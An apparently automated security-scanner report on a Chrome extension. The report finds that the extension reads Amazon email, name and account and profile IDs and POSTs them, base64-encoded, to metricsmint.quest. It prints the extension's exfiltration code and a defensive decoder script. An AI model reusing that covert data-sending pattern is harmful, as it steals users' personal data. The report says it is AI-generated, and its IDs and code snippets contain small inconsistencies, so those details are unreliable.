Is Ad Skipper for Prime Video [QVI] safe?

Medium risk

Ad Skipper for Prime Video is medium risk. On Amazon pages, the extension reads your email, first name, account ID, and profile ID from Amazon's contact page and sends them to metricsmint.quest. Data is base64-encoded, reversible with one call. No consent prompt is shown.

dogooodappv1.0.29Chrome Web Store
45Risk
Who publishes it

HideApp - 67 other listings from the same operator, 15 of them carrying a finding

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

SeverityMEDIUM
ClassUNWANTED
TypeUnexpected
CWECWE-319
SourceAI SANDBOX

Amazon account PII transmitted to third-party server in base64 encoding

On Amazon pages, the extension reads your email, first name, account ID, and profile ID from Amazon's contact page and sends them to metricsmint.quest.

Data is base64-encoded, reversible with one call.

No consent prompt is shown.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You open any Amazon or Prime Video page with the extension installed.

The content script runs on all five Amazon regional domains covered by the extension's host permissions.

The extension did this

The extension fetches your Amazon contact page and sends your email address, first name, account ID, and profile ID to metricsmint.quest.

Data is JSON-serialized, base64-encoded, and POSTed to metricsmint.quest/up without a consent prompt.

02EvidenceFIELD TABLE
Fields transmitted to metricsmint.quest/up
FieldValueWhy it matters
Email address
jane.doe@example.comYour primary Amazon account email, read from the contact page.
First name
JaneYour first name as stored in your Amazon account.
Account ID
A3B2C1X9Z7W5V4Amazon's internal numeric identifier for your account, unique to you.
Profile ID
B01GHJ9KXYZ12345Your Amazon profile identifier, used across services like Prime Video watchlists.
Amazon domain
amazon.comThe regional Amazon domain you were on when the extension ran.
Extension user ID
f3a1b2c4-d5e6-7890-abcd-ef1234567890A persistent random ID generated by the extension to track you across sessions.
03EvidenceOPAQUE REVEAL
Why you can't catch this in DevTools

The POST body is a single base64 string produced by btoa. Base64 is encoding, not encryption, any party who can see the request (proxy, network observer, the receiving server) can recover the plaintext with one atob call in a browser console.

What's actually being sent
{
  "svod": "amazon",
  "accountId": "A3B2C1X9ZW5V4",
  "profileId": "B01GHJ9KXYZ12345",
  "domain": "amazon.com",
  "extension_user_id": "f3a1b2c4-d5e6-7890-abcd-ef1234567890",
  "customerModel.email.value": "jane.doe@example.com",
  "customerFirstName": "Jane"
}
04EvidenceCODE COMPARE
The code that does this

b64encode and the transmission call

What it actually does
Base64 encoder — btoa is standard, not encryptionamazon.min.js
var b64encode = function(data) {
 if (globalThis.TextEncoder && globalThis.btoa) {
 var utf8Data = new TextEncoder.encode(data);
 var binaryString = "";
 for (var i = 0; i < utf8Data.length; i++) {
 binaryString += String.fromCharCode(utf8Data[i]);
 }
 return btoa(binaryString);
 }
 var utf8Buffer = buffer.hp.from(data, "utf-8");
 return utf8Buffer.toString("base64");
};
sendAdditionalProfileData — JSON-stringify + b64encode then POSTamazon.min.js
async function sendAdditionalProfileData(svod, data) {
 const response = await fetch(config.d1 /* 'https://metricsmint.quest/up' */, {
 method: 'POST',
 body: b64encode(JSON.stringify({ svod, ...data }))
 });
 return response.json;
}
05EvidenceTHIRD PARTY LIST
Data recipients
  • metricsmint.quest

    Receives base64-encoded JSON containing Amazon account PII on every extension activation. Not listed as a data processor in the extension's Chrome Web Store privacy disclosure.

06EvidenceARTIFACT
Reproduce it yourself

Decodes a captured POST body from metricsmint.quest/up and prints the plaintext JSON fields. Run against any intercepted request body to see the PII in clear.

RequiresNode.js 14+
decode-metricsmint-payload.js · js
#!/usr/bin/env node
// Decode a captured POST body from metricsmint.quest/up
// Usage: echo '<base64-body>' | node decode-metricsmint-payload.js
// Or: node decode-metricsmint-payload.js <base64-body>

const input = process.argv[2] || require('fs').readFileSync('/dev/stdin', 'utf8').trim;

try {
 const decoded = Buffer.from(input, 'base64').toString('utf-8');
 const parsed = JSON.parse(decoded);
 console.log('Decoded payload:');
 console.log(JSON.stringify(parsed, null, 2));

 // Highlight PII fields
 const piiFields = [
 'customerModel.email.value',
 'customerFirstName',
 'accountId',
 'profileId',
 'extension_user_id',
 ];
 console.log('\nPII fields present:');
 for (const field of piiFields) {
 if (parsed[field] !== undefined) {
 console.log(` ${field}: ${parsed[field]}`);
 }
 }
} catch (err) {
 console.error('Failed to decode:', err.message);
 process.exit(1);
}
How to run it
  1. 1
    Intercept the POST to metricsmint.quest/up (proxy or DevTools Network tab).
  2. 2
    Copy the raw body string.
  3. 3
    Run: echo '<body>' | node decode-metricsmint-payload.js.
  4. 4
    It prints the JSON payload with PII fields labeled.
Updated 30 September 2026pgmodkjklhaccjaidgakcafnieoapeie